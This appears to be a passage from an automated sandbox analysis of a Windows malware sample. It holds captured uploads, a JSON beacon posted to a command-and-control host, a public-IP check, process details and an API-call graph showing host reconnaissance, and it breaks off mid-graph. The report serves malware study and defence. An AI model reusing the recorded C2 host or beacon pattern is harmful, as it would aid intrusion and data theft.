                                                            Dec 20, 2024 16:19:55.566740036 CET2472OUTData Raw: 70 44 2b 4d 79 50 79 5c 2f 66 38 41 54 5c 2f 36 39 4f 2b 66 5c 2f 41 47 66 31 70 31 46 41 48 39 76 46 33 62 32 6c 37 62 53 32 64 5c 2f 62 52 58 6c 6e 63 67 4a 50 62 54 72 75 6a 6b 42 49 77 33 42 44 52 79 49 63 50 46 4e 47 79 79 77 79 42 58 6a 64
                                                            Data Ascii: pD+MyPy\/f8AT\/69O+f\/AGf1p1FAH9vF3b2l7bS2d\/bRXlncgJPbTrujkBIw3BDRyIcPFNGyywyBXjdWANfMNzFBp+uaxp9sWFvYavqVnb+Y25xDa3c0EW9wFDMUjXc2BuOeOw+mZ5cEDPcY\/wA4\/wA59q+VdVuP+Ks8S89PEOsg89jqNzg\/hx\/nNf8ADVx1OnPC4OXLB1aeKcI1eVe0VOdOU3TU7c3s+flkoN8sZuUk
                                                            Dec 20, 2024 16:19:55.566804886 CET4944OUTData Raw: 72 65 64 30 57 32 31 51 57 44 74 48 5a 61 34 64 4f 6c 75 52 6f 57 70 7a 32 2b 6d 61 71 62 53 39 6e 69 67 62 2b 63 4f 4c 75 43 75 4a 75 43 4d 62 50 41 63 52 2b 46 2b 57 34 53 74 52 79 54 41 63 52 59 69 56 4f 66 46 2b 4a 77 2b 47 79 76 48 31 4d 4e
                                                            Data Ascii: red0W21QWDtHZa4dOluRoWpz2+maqbS9nigb+cOLuCuJuCMbPAcR+F+W4StRyTAcRYiVOfF+Jw+GyvH1MNhYV8TiKHE06NBYbMMTTynGe0lGNDMv8AZueTnSlU\/rrhHjXhjjjBQzDhzxRzPF0a2eY\/h3DRq0+EMNXxOaYCnXxM6GGw+I4Zp1q\/1jLsLUzXB+zi518u\/wBq5I8tWFL8Sf8Agov4T03xV+xP8Jf2iIPiF8QfG
                                                            Dec 20, 2024 16:19:55.566926003 CET7416OUTData Raw: 54 45 35 46 6d 57 4a 6f 56 49 34 4c 4d 4b 4f 49 77 31 48 43 34 75 76 68 63 44 54 77 75 4b 35 35 56 35 66 56 4b 74 4b 55 71 47 6c 47 52 5c 2f 70 37 39 44 5c 2f 41 49 42 72 2b 4a 5c 2f 68 75 38 64 6c 47 61 78 79 50 69 6a 67 7a 4e 75 4c 73 67 77 4f
                                                            Data Ascii: TE5FmWJoVI4LMKOIw1HC4uvhcDTwuK55V5fVKtKUqGlGR\/p79D\/AIBr+J\/hu8dlGaxyPijgzNuLsgwOawr4KpUwuD4hyzA4ylUxmW16GKr4rCUcZmFbEYRxp4eDxVHEU44hN1on5q\/sU\/Ez4m\/EbwX8Yh4l0jSNP+HWg3qWPw4\/sbRdI8P2emCZNVvdX8OxWOkWNnBcNY2txot3czsMwXN86q0qXCrb7Vfpj4l0fSk8N
                                                            Dec 20, 2024 16:19:55.572357893 CET2472OUTData Raw: 38 41 58 71 47 54 5a 38 7a 75 6e 6b 5c 2f 76 66 4b 5c 2f 65 66 35 37 5c 2f 41 46 7a 78 57 5a 6f 4d 33 65 58 76 63 49 4e 5c 2f 6d 6a 39 33 5c 2f 77 41 39 76 70 5c 2f 4c 5c 2f 50 4a 74 65 54 35 30 38 7a 66 7a 4a 5c 2f 72 54 2b 2b 39 37 53 30 46 50
                                                            Data Ascii: 8AXqGTZ8zunk\/vfK\/ef57\/AFzxWZoM3eXvcIN\/mj93\/wA9vp\/L\/PJteT508zfzJ\/rT++97S0FPXKsiI+9\/9b5kkv8AnnGaiLc\/f2QmX97\/AM8M5\/z0\/L009n5\/h\/wToP3dorE8Sa9Z+GND1LX9QOLLS7c3NwdwXEYdU+8QQOXHODXbfFPSNG+Fdx8RLSX4r\/Bv4h3vwa+Lfhz4IfGnSfhvrXxJfWPhP8QvF
                                                            Dec 20, 2024 16:19:55.686449051 CET4944OUTData Raw: 34 67 61 56 34 32 38 5a 5c 2f 74 44 66 44 72 53 76 43 75 6f 36 39 38 4e 64 43 76 66 43 66 77 73 38 61 5c 2f 44 76 54 64 56 75 4c 6e 78 70 34 64 30 44 52 62 37 78 78 34 2b 38 48 61 4e 71 33 69 48 55 59 4c 4b 33 31 49 57 38 73 56 37 4a 79 6e 67 72
                                                            Data Ascii: 4gaV428Z\/tDfDrSvCuo698NdCvfCfws8a\/DvTdVuLnxp4d0DRb7xx4+8HaNq3iHUYLK31IW8sV7JyngrVfCHinwd4R8beKPiz8H\/gppnxF8Uat4N+Gln8Z\/EHjnRtW+IWu+HNU\/4R\/wAUyaJaeBfhr8RI\/Dnhjw14neHwvq3j\/wCJ9x8Pfh9H4hOo6bB4pnl8NeLjoH5rkfE\/0dsi4t41424XzPhfBcWcbU+F8Pxlm
                                                            Dec 20, 2024 16:19:55.686475039 CET2472OUTData Raw: 74 66 4e 63 5a 55 78 64 64 78 71 56 36 64 57 56 66 43 31 71 33 4e 67 70 30 4d 50 30 5c 2f 38 41 66 2b 76 39 54 54 4b 72 2b 48 5a 70 66 45 58 6a 62 77 58 34 42 73 39 54 38 48 4c 72 33 6a 33 39 6e 7a 54 50 32 6c 39 47 6e 66 58 39 58 4f 6a 32 5c 2f
                                                            Data Ascii: tfNcZUxddxqV6dWVfC1q3Ngp0MP0\/8Af+v9TTKr+HZpfEXjbwX4Bs9T8HLr3j39nzTP2l9GnfX9XOj2\/wAO9W\/Z+uf2lbW31K8Xwr9th8Rj4dWzxS2Vrpd5pa+IXis01qTTGfWI8\/w9rdn4m0PTPEGnHdY6rbLdW53B\/wB2zMo+YAA8qecD0r9iyHjbhTijE1cJw\/nmCzTE0MDRzKtQw0pupTwOIxuPy2jiZxnCDUJ4\/
                                                            Dec 20, 2024 16:19:55.686542988 CET2472OUTData Raw: 5c 2f 35 37 66 38 41 31 5c 2f 77 35 37 63 30 7a 37 72 66 4c 48 73 5c 2f 65 2b 62 5c 2f 72 66 54 50 62 33 5c 2f 43 72 50 33 63 48 2b 50 38 41 31 57 65 33 2b 66 65 71 7a 52 2b 62 38 69 50 38 6e 6d 5c 2f 36 7a 72 2b 48 36 30 47 6c 50 72 38 76 31 49
                                                            Data Ascii: \/57f8A1\/w57c0z7rfLHs\/e+b\/rfTPb3\/CrP3cH+P8A1We3+feqzR+b8iP8nm\/6zr+H60GlPr8v1IY9jRvD9\/8A55faP8+nb096O7nzN3\/TT\/I\/xx+lTSb1j+dN\/wDzyj9xnt\/n60z5\/Lm2SfJm3\/67w9vw\/rQaEMkaNsdx5SeV5XT9\/Fcf8\/fX\/D3NQ+YY40fZx5X+r\/M\/n\/npxVpo\/ufPGn7ryu\
                                                            Dec 20, 2024 16:19:55.686896086 CET4944OUTData Raw: 7a 58 45 56 63 5a 53 79 7a 4b 4d 56 6d 57 50 78 46 43 6a 6a 4d 73 79 6d 4f 59 59 33 45 35 33 69 38 76 72 30 4d 50 52 78 46 50 47 5a 6a 67 63 30 7a 4c 4b 34 55 4d 48 56 77 6d 44 70 55 63 54 44 45 79 77 39 62 46 55 71 6c 54 45 5c 2f 30 44 67 50 70
                                                            Data Ascii: zXEVcZSyzKMVmWPxFCjjMsymOYY3E53i8vr0MPRxFPGZjgc0zLK4UMHVwmDpUcTDEyw9bFUqlTE\/0DgPp14XOuI6me8XcDZHhaGCnnWdYbK8uwVbEYHOs7r5VgcDkeEzTCYnE18JLA5bi8qyvMVWr0K9ehiMJOWXVMA8RLl47wX8c9VtLz9ijxTqP7U7+Bf2ePgn46\/YO1v4nfsUS6H+0Naax8P\/ABp8EPFfg+X9oL4u3eie
                                                            Dec 20, 2024 16:19:56.719567060 CET212INHTTP/1.0 503 Service Unavailable
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.1049703185.121.15.192807928C:\Users\user\Desktop\5Jat5RkD3a.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 20, 2024 16:19:58.179685116 CET287OUTPOST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1
                                                            Host: home.twentytk20ht.top
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 143
                                                            Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                            Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
                                                            Dec 20, 2024 16:19:59.464418888 CET212INHTTP/1.0 503 Service Unavailable
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.104970134.226.108.1554437928C:\Users\user\Desktop\5Jat5RkD3a.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-20 15:19:53 UTC52OUTGET /ip HTTP/1.1
                                                            Host: httpbin.org
                                                            Accept: */*
                                                            2024-12-20 15:19:54 UTC224INHTTP/1.1 200 OK
                                                            Date: Fri, 20 Dec 2024 15:19:53 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 31
                                                            Connection: close
                                                            Server: gunicorn/19.9.0
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Credentials: true
                                                            2024-12-20 15:19:54 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                            Data Ascii: { "origin": "8.46.123.189"}


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:10:19:47
                                                            Start date:20/12/2024
                                                            Path:C:\Users\user\Desktop\5Jat5RkD3a.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\5Jat5RkD3a.exe"
                                                            Imagebase:0x270000
                                                            File size:4'449'280 bytes
                                                            MD5 hash:8C39C06251F42E3B7EBC710FE06753AA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:3%
                                                              Dynamic/Decrypted Code Coverage:35.2%
                                                              Signature Coverage:10.8%
                                                              Total number of Nodes:463
                                                              Total number of Limit Nodes:55
                                                              execution_graph 87573 28d5e0 87574 28d652 WSAStartup 87573->87574 87575 28d5f0 87573->87575 87574->87575 87765 2ab400 87766 2ab40b 87765->87766 87767 2ab425 87765->87767 87770 277770 87766->87770 87768 2ab421 87771 2777b6 recv 87770->87771 87772 277790 87770->87772 87773 277799 87771->87773 87772->87771 87772->87773 87773->87768 87774 2ae400 87775 2ae412 87774->87775 87777 2ae459 87774->87777 87778 2a68b0 socket ioctlsocket connect getsockname closesocket 87775->87778 87778->87777 87779 2ab3c0 87780 2ab3cb 87779->87780 87781 2ab3ee 87779->87781 87785 2776a0 87780->87785 87789 2a9290 87780->87789 87782 2ab3ea 87786 2776e6 send 87785->87786 87787 2776c0 87785->87787 87788 2776c9 87786->87788 87787->87786 87787->87788 87788->87782 87790 2776a0 send 87789->87790 87791 2a92e5 87790->87791 87792 2a9335 WSAIoctl 87791->87792 87795 2a9392 87791->87795 87793 2a9366 87792->87793 87792->87795 87794 2a9371 setsockopt 87793->87794 87793->87795 87794->87795 87795->87782 87576 706040d Process32FirstW 87577 706042c 87576->87577 87796 272f17 87803 272f2c 87796->87803 87797 2731d3 87798 272fb3 RegOpenKeyExA 87798->87803 87799 27315c RegEnumKeyExA 87799->87803 87800 273046 RegOpenKeyExA 87801 273089 RegQueryValueExA 87800->87801 87800->87803 87802 27313b RegCloseKey 87801->87802 87801->87803 87802->87803 87803->87797 87803->87798 87803->87799 87803->87800 87803->87802 87804 2731d7 87807 2731f4 87804->87807 87805 273200 87806 2732dc CloseHandle 87806->87805 87807->87805 87807->87806 87578 281139 87579 281148 87578->87579 87581 281527 87579->87581 87582 280f69 87579->87582 87586 27fec0 7 API calls 87579->87586 87581->87582 87587 2822d0 7 API calls 87581->87587 87583 280f00 87582->87583 87588 2ad4d0 socket ioctlsocket connect getsockname closesocket 87582->87588 87586->87581 87587->87582 87588->87583 87589 324720 87593 324728 87589->87593 87590 324733 87592 324774 87593->87590 87600 32476c 87593->87600 87601 325540 socket ioctlsocket connect getsockname closesocket 87593->87601 87595 32482e 87595->87600 87602 329270 87595->87602 87597 324860 87607 324950 87597->87607 87599 324878 87600->87599 87615 3230a0 socket ioctlsocket connect getsockname closesocket 87600->87615 87601->87595 87616 32a440 87602->87616 87604 329297 87606 3292ab 87604->87606 87655 32bbe0 socket ioctlsocket connect getsockname closesocket 87604->87655 87606->87597 87608 324966 87607->87608 87612 3249c5 87608->87612 87614 3249b9 87608->87614 87657 32b590 if_indextoname 87608->87657 87610 324aa0 gethostname 87610->87612 87610->87614 87611 324a3e 87611->87612 87658 32bbe0 socket ioctlsocket connect getsockname closesocket 87611->87658 87612->87600 87614->87610 87614->87612 87615->87592 87617 32a46b 87616->87617 87618 32a4db 87617->87618 87619 32a48b GetAdaptersAddresses 87617->87619 87620 32aa03 RegOpenKeyExA 87618->87620 87634 32ad14 87618->87634 87637 32a4a6 87619->87637 87650 32a53f 87619->87650 87621 32ab70 RegOpenKeyExA 87620->87621 87622 32aa27 RegQueryValueExA 87620->87622 87625 32ac34 RegOpenKeyExA 87621->87625 87648 32ab90 87621->87648 87623 32aa71 87622->87623 87624 32aacc RegQueryValueExA 87622->87624 87623->87624 87633 32aa85 RegQueryValueExA 87623->87633 87627 32ab66 RegCloseKey 87624->87627 87628 32ab0e 87624->87628 87626 32acf8 RegOpenKeyExA 87625->87626 87652 32ac54 87625->87652 87629 32ad56 RegEnumKeyExA 87626->87629 87626->87634 87627->87621 87628->87627 87638 32ab1e RegQueryValueExA 87628->87638 87631 32ad9b 87629->87631 87629->87634 87630 32a4f3 GetAdaptersAddresses 87632 32a505 87630->87632 87630->87650 87635 32ae16 RegOpenKeyExA 87631->87635 87639 32a527 GetAdaptersAddresses 87632->87639 87653 32a520 87632->87653 87636 32aab3 87633->87636 87634->87604 87640 32ae34 RegQueryValueExA 87635->87640 87641 32addf RegEnumKeyExA 87635->87641 87636->87624 87637->87630 87637->87653 87642 32ab4c 87638->87642 87639->87650 87639->87653 87644 32af43 RegQueryValueExA 87640->87644 87654 32adaa 87640->87654 87641->87634 87641->87635 87642->87627 87645 32b052 RegQueryValueExA 87644->87645 87644->87654 87647 32adc7 RegCloseKey 87645->87647 87645->87654 87646 32a794 GetBestRoute2 87646->87650 87647->87641 87648->87625 87649 32afa0 RegQueryValueExA 87649->87654 87650->87646 87651 32a6c7 GetBestRoute2 87650->87651 87650->87653 87651->87650 87652->87626 87653->87618 87656 32b830 if_indextoname 87653->87656 87654->87644 87654->87645 87654->87647 87654->87649 87655->87606 87656->87618 87657->87611 87658->87614 87808 323c00 87809 323c23 87808->87809 87811 323c0d 87808->87811 87809->87811 87812 33b180 87809->87812 87815 33b19b 87812->87815 87819 33b2e3 87812->87819 87816 33b2a9 getsockname 87815->87816 87818 33b020 closesocket 87815->87818 87815->87819 87820 33af30 87815->87820 87824 33b060 87815->87824 87829 33b020 87816->87829 87818->87815 87819->87811 87821 33af63 socket 87820->87821 87822 33af4c 87820->87822 87821->87815 87822->87821 87823 33af52 87822->87823 87823->87815 87828 33b080 87824->87828 87825 33b0b0 connect 87826 33b0bf WSAGetLastError 87825->87826 87827 33b0ea 87826->87827 87826->87828 87827->87815 87828->87825 87828->87826 87828->87827 87830 33b052 87829->87830 87831 33b029 87829->87831 87830->87815 87832 33b04b closesocket 87831->87832 87833 33b03e 87831->87833 87832->87830 87833->87815 87834 33a080 87837 339740 87834->87837 87836 33a09b 87838 339780 87837->87838 87842 33975d 87837->87842 87839 339925 RegOpenKeyExA 87838->87839 87838->87842 87840 33995a RegQueryValueExA 87839->87840 87839->87842 87841 339986 RegCloseKey 87840->87841 87841->87842 87842->87836 87659 27f7b0 87660 27f7c3 87659->87660 87666 27f97a 87659->87666 87661 27f932 87660->87661 87660->87666 87682 27fec0 7 API calls 87660->87682 87667 2acd80 87661->87667 87664 27f942 87665 27f9bb WSACloseEvent 87664->87665 87665->87666 87668 2ad0e5 87667->87668 87674 2acd9a 87667->87674 87668->87664 87669 2ad0b4 87692 28f6c0 7 API calls 87669->87692 87673 2ad064 87673->87669 87691 2ade00 socket ioctlsocket connect getsockname closesocket 87673->87691 87674->87668 87679 2ace6b 87674->87679 87683 2adc30 socket ioctlsocket connect getsockname closesocket 87674->87683 87678 2ad016 87678->87673 87690 2ade00 socket ioctlsocket connect getsockname closesocket 87678->87690 87679->87673 87680 2acf4b 87679->87680 87684 2adc30 socket ioctlsocket connect getsockname closesocket 87679->87684 87680->87678 87685 2ae130 socket ioctlsocket connect getsockname closesocket 87680->87685 87686 286fa0 87680->87686 87682->87660 87683->87674 87684->87679 87685->87680 87687 286fd4 87686->87687 87689 286feb 87686->87689 87688 287207 select 87687->87688 87687->87689 87688->87689 87689->87680 87690->87678 87691->87673 87692->87668 87693 2729ff FindFirstFileA 87694 272a31 87693->87694 87695 272a5c RegOpenKeyExA 87694->87695 87696 272a93 87695->87696 87697 272ade CharUpperA 87696->87697 87698 272b0a 87697->87698 87699 272bf9 QueryFullProcessImageNameA 87698->87699 87700 272c3b CloseHandle 87699->87700 87701 272c64 87700->87701 87702 272df1 CloseHandle 87701->87702 87703 272e23 87702->87703 87843 273d5e 87848 273d30 87843->87848 87844 273d90 87852 27fcb0 7 API calls 87844->87852 87847 273dc1 87848->87843 87848->87844 87849 280ab0 87848->87849 87853 2805b0 87849->87853 87851 280acd 87851->87848 87852->87847 87856 2807c7 87853->87856 87858 2805bd 87853->87858 87854 280707 WSAEventSelect 87854->87856 87854->87858 87855 2807ef 87855->87856 87857 286fa0 select 87855->87857 87859 280847 87855->87859 87856->87851 87857->87859 87858->87854 87858->87855 87858->87856 87860 2776a0 send 87858->87860 87859->87856 87861 2809e8 WSAEnumNetworkEvents 87859->87861 87862 2809d0 WSAEventSelect 87859->87862 87860->87858 87861->87859 87861->87862 87862->87859 87862->87861 87704 2a95b0 87705 2a95c8 87704->87705 87706 2a95fd 87704->87706 87705->87706 87708 2aa150 87705->87708 87709 2aa15f 87708->87709 87711 2aa1d0 87708->87711 87710 2aa181 getsockname 87709->87710 87709->87711 87710->87711 87711->87706 87712 2a6ab0 87713 2a6ad5 87712->87713 87714 2a6bb4 87713->87714 87716 286fa0 select 87713->87716 87715 325ed0 7 API calls 87714->87715 87717 2a6ba9 87715->87717 87718 2a6b54 87716->87718 87718->87714 87718->87717 87719 2a6b5d 87718->87719 87719->87717 87721 325ed0 87719->87721 87724 325a50 87721->87724 87723 325ee5 87723->87719 87725 325a58 87724->87725 87729 325ea0 87724->87729 87726 325b50 87725->87726 87733 325b88 87725->87733 87738 325a99 87725->87738 87730 325eb4 87726->87730 87731 325b7a 87726->87731 87726->87733 87727 325e96 87757 339480 socket ioctlsocket connect getsockname closesocket 87727->87757 87729->87723 87758 326f10 socket ioctlsocket connect getsockname closesocket 87730->87758 87747 3270a0 87731->87747 87741 325cae 87733->87741 87755 325ef0 socket ioctlsocket connect getsockname 87733->87755 87735 325ec2 87735->87735 87738->87733 87739 3270a0 6 API calls 87738->87739 87754 326f10 socket ioctlsocket connect getsockname closesocket 87738->87754 87739->87738 87741->87727 87743 33a920 87741->87743 87756 339320 socket ioctlsocket connect getsockname closesocket 87741->87756 87744 33a944 87743->87744 87745 33a977 send 87744->87745 87746 33a94b 87744->87746 87745->87741 87746->87741 87748 3270ae 87747->87748 87750 32717f 87748->87750 87753 3271a7 87748->87753 87759 33a8c0 87748->87759 87763 3271c0 socket ioctlsocket connect getsockname 87748->87763 87750->87753 87764 339320 socket ioctlsocket connect getsockname closesocket 87750->87764 87753->87733 87754->87738 87755->87733 87756->87741 87757->87729 87758->87735 87760 33a903 recvfrom 87759->87760 87761 33a8e6 87759->87761 87762 33a8ed 87760->87762 87761->87760 87761->87762 87762->87748 87763->87748 87764->87753 87863 2a8b50 87864 2a8b6b 87863->87864 87881 2a8bb5 87863->87881 87865 2a8b8f 87864->87865 87866 2a8bf3 87864->87866 87864->87881 87898 286e40 select 87865->87898 87883 2aa550 87866->87883 87869 2a8bfc 87871 2a8c1f connect 87869->87871 87872 2a8c35 87869->87872 87874 2a8cb2 87869->87874 87869->87881 87870 2a8cd9 SleepEx 87878 2a8d14 87870->87878 87871->87872 87877 2aa150 getsockname 87872->87877 87873 2aa150 getsockname 87875 2a8dff 87873->87875 87874->87873 87874->87875 87874->87881 87875->87881 87899 2778b0 closesocket 87875->87899 87880 2a8ba1 87877->87880 87878->87874 87879 2a8d43 87878->87879 87882 2aa150 getsockname 87879->87882 87880->87870 87880->87874 87880->87881 87882->87881 87884 2aa575 87883->87884 87888 2aa597 87884->87888 87901 2775e0 87884->87901 87886 2778b0 closesocket 87887 2aa713 87886->87887 87887->87869 87889 2aa811 setsockopt 87888->87889 87894 2aa83b 87888->87894 87897 2aa69b 87888->87897 87889->87894 87891 2aaf56 87892 2aaf5d 87891->87892 87891->87897 87892->87887 87893 2aa150 getsockname 87892->87893 87893->87887 87896 2aabe1 87894->87896 87894->87897 87907 2a6be0 8 API calls 87894->87907 87896->87897 87906 2d67e0 ioctlsocket 87896->87906 87897->87886 87897->87887 87898->87880 87900 2778c5 87899->87900 87900->87881 87902 277607 socket 87901->87902 87904 2775ef 87901->87904 87903 27762b 87902->87903 87903->87888 87904->87902 87905 277643 87904->87905 87905->87888 87906->87891 87907->87896 87908 27255d 87961 5f9f70 87908->87961 87910 27256c GetSystemInfo 87911 272589 87910->87911 87912 2725a0 GlobalMemoryStatusEx 87911->87912 87913 2725ec 87912->87913 87963 7010c1f 87913->87963 87967 7010ce1 87913->87967 87971 7010c14 87913->87971 87975 7010b17 87913->87975 87981 7010b53 87913->87981 87987 7010cd2 87913->87987 87991 7010acf 87913->87991 87997 7010c50 87913->87997 88001 7010a83 87913->88001 88007 7010c84 87913->88007 88011 7010d40 87913->88011 88015 7010cf3 87913->88015 88019 70109fe 87913->88019 88028 7010bbe 87913->88028 88034 7010a3e 87913->88034 88040 70109f7 87913->88040 88046 7010c3e 87913->88046 88050 7010bf7 87913->88050 88056 7010af7 87913->88056 88062 7010ab2 87913->88062 88068 7010cb5 87913->88068 88072 7010bb3 87913->88072 88078 7010a73 87913->88078 88084 7010b71 87913->88084 88090 7010be2 87913->88090 88096 7010b6a 87913->88096 88102 7010d6d 87913->88102 88106 7010c6b 87913->88106 88110 7010d2a 87913->88110 88115 7010ae7 87913->88115 88121 7010dab 87913->88121 88125 7010ba3 87913->88125 88131 70109a5 87913->88131 88141 7010d23 87913->88141 88145 7010aa0 87913->88145 88151 7010a21 87913->88151 87914 272762 87917 2727d6 KiUserCallbackDispatcher 87914->87917 87915 27263c GetDriveTypeA 87916 272655 GetDiskFreeSpaceExA 87915->87916 87919 27261b 87915->87919 87916->87919 87918 2727f8 87917->87918 87920 272842 SHGetKnownFolderPath 87918->87920 87919->87914 87919->87915 87921 2728c3 87920->87921 87922 2728d9 FindFirstFileW 87921->87922 87923 272906 FindNextFileW 87922->87923 87924 272928 87922->87924 87923->87923 87923->87924 87962 5f9f7d 87961->87962 87962->87910 87962->87962 87964 7010bbd 87963->87964 87964->87963 87965 7010d77 GetLogicalDrives 87964->87965 87966 7010d92 87965->87966 87966->87919 87968 7010d00 GetLogicalDrives 87967->87968 87970 7010d92 87968->87970 87970->87919 87972 7010c17 GetLogicalDrives 87971->87972 87974 7010d92 87972->87974 87974->87919 87976 7010ab7 87975->87976 87977 7010c14 GetLogicalDrives 87976->87977 87978 7010c0c GetLogicalDrives 87977->87978 87980 7010d92 87978->87980 87980->87919 87982 7010b5d 87981->87982 87982->87919 87983 7010c14 GetLogicalDrives 87982->87983 87984 7010c0c GetLogicalDrives 87983->87984 87986 7010d92 87984->87986 87986->87919 87988 7010cd7 GetLogicalDrives 87987->87988 87990 7010d92 87988->87990 87990->87919 87992 7010ad9 87991->87992 87993 7010c14 GetLogicalDrives 87992->87993 87994 7010c0c GetLogicalDrives 87993->87994 87996 7010d92 87994->87996 87996->87919 87998 7010c59 GetLogicalDrives 87997->87998 88000 7010d92 87998->88000 88000->87919 88002 7010aa8 88001->88002 88003 7010c14 GetLogicalDrives 88002->88003 88004 7010c0c GetLogicalDrives 88003->88004 88006 7010d92 88004->88006 88006->87919 88008 7010cc5 GetLogicalDrives 88007->88008 88010 7010d92 88008->88010 88010->87919 88012 7010d4a GetLogicalDrives 88011->88012 88014 7010d92 88012->88014 88014->87919 88016 7010d1e GetLogicalDrives 88015->88016 88018 7010d92 88016->88018 88018->87919 88022 701098c 88019->88022 88023 7010a17 88019->88023 88020 70109f7 2 API calls 88020->88022 88021 70109f3 88022->88020 88022->88021 88024 7010c14 GetLogicalDrives 88023->88024 88025 7010c0c GetLogicalDrives 88024->88025 88027 7010d92 88025->88027 88027->87919 88029 7010bd2 88028->88029 88030 7010c14 GetLogicalDrives 88029->88030 88031 7010c0c GetLogicalDrives 88030->88031 88033 7010d92 88031->88033 88033->87919 88035 7010a75 88034->88035 88036 7010c14 GetLogicalDrives 88035->88036 88037 7010c0c GetLogicalDrives 88036->88037 88039 7010d92 88037->88039 88039->87919 88041 7010a04 88040->88041 88042 7010c14 GetLogicalDrives 88041->88042 88043 7010c0c GetLogicalDrives 88042->88043 88045 7010d92 88043->88045 88045->87919 88047 7010c43 GetLogicalDrives 88046->88047 88049 7010d92 88047->88049 88049->87919 88051 7010c01 88050->88051 88053 7010c0c GetLogicalDrives 88050->88053 88052 7010c14 GetLogicalDrives 88051->88052 88052->88053 88055 7010d92 88053->88055 88055->87919 88057 7010b22 88056->88057 88058 7010c14 GetLogicalDrives 88057->88058 88059 7010c0c GetLogicalDrives 88058->88059 88061 7010d92 88059->88061 88061->87919 88063 7010ac6 88062->88063 88064 7010c14 GetLogicalDrives 88063->88064 88065 7010c0c GetLogicalDrives 88064->88065 88067 7010d92 88065->88067 88067->87919 88069 7010ca0 GetLogicalDrives 88068->88069 88071 7010d92 88069->88071 88071->87919 88073 7010bcf 88072->88073 88074 7010c14 GetLogicalDrives 88073->88074 88075 7010c0c GetLogicalDrives 88074->88075 88077 7010d92 88075->88077 88077->87919 88079 7010a86 88078->88079 88080 7010c14 GetLogicalDrives 88079->88080 88081 7010c0c GetLogicalDrives 88080->88081 88083 7010d92 88081->88083 88083->87919 88085 7010ba5 88084->88085 88086 7010c14 GetLogicalDrives 88085->88086 88087 7010c0c GetLogicalDrives 88086->88087 88089 7010d92 88087->88089 88089->87919 88091 7010c02 88090->88091 88092 7010c14 GetLogicalDrives 88091->88092 88093 7010c0c GetLogicalDrives 88092->88093 88095 7010d92 88093->88095 88095->87919 88097 7010b84 88096->88097 88098 7010c14 GetLogicalDrives 88097->88098 88099 7010c0c GetLogicalDrives 88098->88099 88101 7010d92 88099->88101 88101->87919 88103 7010d70 GetLogicalDrives 88102->88103 88105 7010d92 88103->88105 88105->87919 88107 7010c2c GetLogicalDrives 88106->88107 88109 7010d92 88107->88109 88109->87919 88111 7010d14 88110->88111 88112 7010d33 88110->88112 88111->87919 88113 7010d77 GetLogicalDrives 88112->88113 88114 7010d92 88112->88114 88113->88114 88114->87919 88116 7010aeb 88115->88116 88117 7010c14 GetLogicalDrives 88116->88117 88118 7010c0c GetLogicalDrives 88117->88118 88120 7010d92 88118->88120 88120->87919 88122 7010d70 88121->88122 88123 7010d77 GetLogicalDrives 88122->88123 88124 7010d92 88122->88124 88123->88124 88124->87919 88126 7010bb6 88125->88126 88127 7010c14 GetLogicalDrives 88126->88127 88128 7010c0c GetLogicalDrives 88127->88128 88130 7010d92 88128->88130 88130->87919 88132 70109fb 88131->88132 88133 701098c 